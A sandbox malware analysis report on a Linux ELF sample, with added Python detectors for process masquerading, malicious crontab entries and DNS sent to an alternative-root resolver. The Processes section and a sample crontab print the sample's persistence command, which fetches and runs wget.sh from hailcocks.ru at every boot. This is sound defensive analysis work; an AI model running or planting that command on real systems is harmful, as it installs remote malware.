Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-czw7fsznhk
Target 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
SHA256 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443
Tags
defense_evasion discovery execution persistence privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443

Threat Level: Shows suspicious behavior

The file 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:31

Reported

2024-10-27 02:33

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

149s

Max time network

139s

Command Line

[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]

Signatures

File and Directory Permissions Modification

defense_evasion

Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 152.53.15.127 | N/A | N/A

Creates/modifies Cron job

execution persistence privilege_escalation

Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.1cgCnI | /usr/bin/crontab | N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | /bin/busybox ntpd | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
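The sample's name change is only cosmetic: argv[0] and the comm name now say "/bin/busybox ntpd", but /proc/<pid>/exe still points at the file that was actually executed, here /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf. The following script is an added example (not code from the report, the sandbox, or the sample) that walks a /proc-shaped tree and flags processes whose argv[0] names a different binary than their exe link, or whose exe lives in a world-writable directory. build_sample_proc() creates a constructed tree in a temp directory using PIDs and paths taken from the report, so it runs offline; on a live host call find_masqueraders("/proc") as root.

```python
"""Find processes whose advertised name disagrees with the binary they run.

Added example, not part of the sandbox report or the sample.  On a live host
call find_masqueraders("/proc") as root; build_sample_proc() creates a
constructed, /proc-shaped tree in a temp dir so the example runs offline
(PIDs and paths in it are taken from the report, not captured live).
"""
import os
import tempfile

SAMPLE = "721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf"
# Directories a long-running daemon should never be executing from.
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/run/user/")


def _read(path):
    try:
        with open(path, "rb") as f:
            return f.read()
    except OSError:
        return b""


def find_masqueraders(proc_root="/proc"):
    """Return (pid, argv0, exe, reasons) for every process where argv[0]
    names a different binary than /proc/<pid>/exe, or where exe lives in a
    world-writable directory.  Processes whose exe link cannot be read
    (kernel threads, or insufficient privilege) are skipped."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:
            continue
        # The kernel appends " (deleted)" when the binary has been unlinked,
        # which self-deleting bots routinely do after starting.
        exe_path = exe.replace(" (deleted)", "")
        argv = _read(os.path.join(pid_dir, "cmdline")).split(b"\0")
        # Login shells prefix argv[0] with "-" ("-bash"); strip it.
        argv0 = argv[0].decode(errors="replace").lstrip("-") if argv else ""
        reasons = []
        if argv0 and os.path.basename(argv0) != os.path.basename(exe_path):
            reasons.append("argv[0] %r does not match exe %r" % (argv0, exe_path))
        if exe_path.startswith(SUSPECT_DIRS):
            reasons.append("exe runs from a world-writable directory")
        if reasons:
            hits.append((int(entry), argv0, exe_path, reasons))
    return sorted(hits)


def build_sample_proc():
    """Constructed /proc snapshot modelled on the behavioral1 detonation."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    table = {
        1:    ("/usr/lib/systemd/systemd\0--system\0", "/usr/lib/systemd/systemd"),
        861:  ("/usr/sbin/cron\0-f\0",                 "/usr/sbin/cron"),
        1368: ("-bash\0",                              "/usr/bin/bash"),
        1460: ("/bin/busybox\0ntpd\0",                 "/tmp/" + SAMPLE),
    }
    for pid, (cmdline, exe) in table.items():
        pid_dir = os.path.join(root, str(pid))
        os.makedirs(pid_dir)
        with open(os.path.join(pid_dir, "cmdline"), "wb") as f:
            f.write(cmdline.encode())
        os.symlink(exe, os.path.join(pid_dir, "exe"))  # dangling link is fine here
    return root


if __name__ == "__main__":
    for pid, argv0, exe, reasons in find_masqueraders(build_sample_proc()):
        print(pid, argv0, "->", exe, "|", "; ".join(reasons))
```

The exe link is the authoritative signal; argv[0] and /proc/<pid>/comm are both under the process's control (exec-time argv rewriting and prctl(PR_SET_NAME) respectively). Expect benign mismatches from symlinked binaries (for example /sbin/init resolving to systemd, or python3 resolving to a versioned interpreter) and from daemons such as sshd that rewrite their argv; a short allowlist of those keeps the output usable.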

Reads runtime system information

discovery
Description | Indicator | Process | Target
File opened for reading | /proc/861/cmdline | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/270/cmdline | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1458/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1410/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1368/cmdline | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1431/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1/cmdline | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1454/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1455/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1459/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1460/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1463/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1465/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1405/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1422/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1432/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1466/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1457/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1461/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1462/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1464/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1467/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/mounts | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1437/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1456/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1468/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A

Processes

/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf

[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]
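The /bin/sh command line above is the whole persistence mechanism: the existing crontab is read back with crontab -l, an @reboot entry is appended that downloads wget.sh from hailcocks.ru into /tmp (trying wget, then curl), marks it world-executable and runs it, and the result is written back with crontab -. The tmp.1cgCnI file in the Files section is the temporary spool file crontab(1) writes before renaming it into place, which is why the sandbox attributes the modification to /usr/bin/crontab rather than to the sample. The script below is an added example (not code from the report or the sample) that audits crontab text for this download-and-execute pattern; SAMPLE_CRONTAB is constructed here, its last line being the entry the command above installs and the others ordinary filler.

```python
"""Audit crontab text for download-and-execute persistence entries.

Added example, not part of the report.  audit_crontab() takes the text of a
crontab (output of `crontab -l -u <user>`, or a file under
/var/spool/cron/crontabs/) and returns entries that fetch a remote payload
and run it.  SAMPLE_CRONTAB is constructed; only its last line comes from
the detonation above.
"""
import re

FETCHERS = re.compile(r"(?<![\w/.-])(wget|curl|tftp|ftpget)(?=\s|$)")
URL = re.compile(r"(?:https?|ftp|tftp)://[^\s;|&\"'`)]+")
# chmod with any execute bit set: octal containing a 7, or a +x form.
CHMOD_EXEC = re.compile(r"\bchmod\s+(?:[0-7]*7[0-7]*|[ugoa]*\+[rw]*x)\b")
STAGING_DIRS = ("/tmp", "/dev/shm", "/var/tmp")

SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
"""


def split_crontab_line(line):
    """Return (schedule, command), or None for blank, comment and VAR= lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
        return None
    if line.startswith("@"):                 # @reboot, @hourly, ...
        sched, _, cmd = line.partition(" ")
    else:                                    # m h dom mon dow command
        fields = line.split(None, 5)
        if len(fields) < 6:
            return None
        sched, cmd = " ".join(fields[:5]), fields[5]
    return sched, cmd.strip()


def audit_crontab(text):
    """Return a list of {line, schedule, urls, reasons} for suspicious entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = split_crontab_line(raw)
        if parsed is None:
            continue
        sched, cmd = parsed
        urls = sorted(set(URL.findall(cmd)))
        reasons = []
        if sched == "@reboot":
            reasons.append("runs at every boot")
        if urls and FETCHERS.search(cmd):
            reasons.append("fetches remote payload")
        if any(d in cmd for d in STAGING_DIRS):
            reasons.append("works in a world-writable directory")
        if CHMOD_EXEC.search(cmd):
            reasons.append("makes a file executable")
        names = {u.rsplit("/", 1)[-1] for u in urls}
        if any(re.search(r"(?:\./|\b(?:sh|bash)\s+)" + re.escape(n) + r"\b", cmd)
               for n in names if n):
            reasons.append("executes the downloaded file")
        # A bare fetch is common in legitimate jobs; require corroboration.
        if urls and len(reasons) >= 2:
            findings.append({"line": lineno, "schedule": sched,
                             "urls": urls, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print("line %d (%s): %s -> %s" % (f["line"], f["schedule"],
                                         ", ".join(f["urls"]), "; ".join(f["reasons"])))
```

To sweep a host, run audit_crontab over every file in /var/spool/cron/crontabs/ and over /etc/crontab and /etc/cron.d/*; the system files carry an extra user field after the five time fields, so split with split(None, 6) for those. A fetch alone is not treated as a finding because legitimate jobs download feeds and certificates; the combination of @reboot, a staging directory, an execute-bit change and running the fetched file is what distinguishes this entry.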

Network

Country | Destination | Domain | Proto
N/A | 224.0.0.251:5353 | | udp
DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp
HK | 193.233.193.45:13831 | kingstonwikkerink.dyn | tcp
US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp
US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp
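Two things in this table explain the "Unexpected DNS network traffic destination" signature. The VM's own resolver is 1.1.1.1 (that is where Ubuntu's connectivity-check queries go), but the sample sent its lookup for kingstonwikkerink.dyn to 152.53.15.127:53 directly, bypassing the host resolver and any DNS-based filtering in front of it. It has to: .dyn is not delegated in the ICANN root zone; it is a top-level domain of the OpenNIC alternative root, so the name only resolves through a server that serves that root. The TCP connection to 193.233.193.45:13831 is the follow-on to that lookup. The following script is an added example (not code from the report or the sandbox) that applies both checks to a flow list; SAMPLE_FLOWS transcribes the table above, and the alternative-root TLD set is a partial list written from memory, so treat it as an assumption to be maintained from OpenNIC's published TLD list.

```python
"""Flag DNS that bypasses the host resolver and names that need an alt root.

Added example, not part of the report.  SAMPLE_FLOWS transcribes the
Network table of the behavioral1 detonation.  ALT_ROOT_TLDS is a partial,
from-memory list of OpenNIC TLDs (assumption: verify against opennic.org).
"""
import ipaddress

ALT_ROOT_TLDS = {"dyn", "geek", "bbs", "pirate", "libre", "oss", "null",
                 "indy", "parody", "oz", "o"}

SAMPLE_FLOWS = [
    # (country, destination, domain, proto) as listed in the report
    ("N/A", "224.0.0.251:5353", "", "udp"),
    ("DE", "152.53.15.127:53", "kingstonwikkerink.dyn", "udp"),
    ("HK", "193.233.193.45:13831", "kingstonwikkerink.dyn", "tcp"),
    ("US", "1.1.1.1:53", "connectivity-check.ubuntu.com", "udp"),
    ("US", "1.1.1.1:53", "connectivity-check.ubuntu.com", "udp"),
]


def audit_flows(flows, resolvers):
    """Return [(destination, [reasons])] for flows a stock host should not make:
    DNS sent to an address outside `resolvers`, lookups of names under an
    alternative-root TLD, and follow-on connections to such names.  Multicast
    destinations (mDNS on 224.0.0.251:5353) are link-local and not flagged."""
    hits = []
    for _, dest, domain, proto in flows:
        host, _, port = dest.rpartition(":")
        host = host.strip("[]")              # tolerate "[v6addr]:port"
        tld = domain.rsplit(".", 1)[-1].lower() if domain else ""
        reasons = []
        if tld in ALT_ROOT_TLDS:
            reasons.append("%s is under alternative-root TLD .%s" % (domain, tld))
        if port == "53":
            if not ipaddress.ip_address(host).is_multicast and host not in resolvers:
                reasons.append("DNS sent to non-configured resolver %s" % host)
        elif tld in ALT_ROOT_TLDS:
            reasons.append("%s/%s follow-on connection to %s" % (proto, port, domain))
        if reasons:
            hits.append((dest, reasons))
    return hits


if __name__ == "__main__":
    for dest, reasons in audit_flows(SAMPLE_FLOWS, {"1.1.1.1"}):
        print(dest, "|", "; ".join(reasons))
```

On a real network the resolver set comes from /etc/resolv.conf or the DHCP-assigned servers, and the same rule is cheap to express as an egress firewall policy: allow UDP/TCP 53 only to the configured resolvers, which would have left this sample unable to resolve its controller at all.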

Files

/var/spool/cron/crontabs/tmp.1cgCnI

MD5 050970160d674c8e3e883f557c869f9c
SHA1 9f62fac10caa5e0f6f9642947ef6e7b8e3418dbc
SHA256 f93a301e05ee4495bf0a2c767c9a61a4f084c19bc08f618c5a0118533391f203
SHA512 584e048471b1d5f554923779f088f10a26d72e6d04200b5cd4049191837de7484b46c578448223888ea5bf054412966bc216818d6fbc03800f39432683f67a10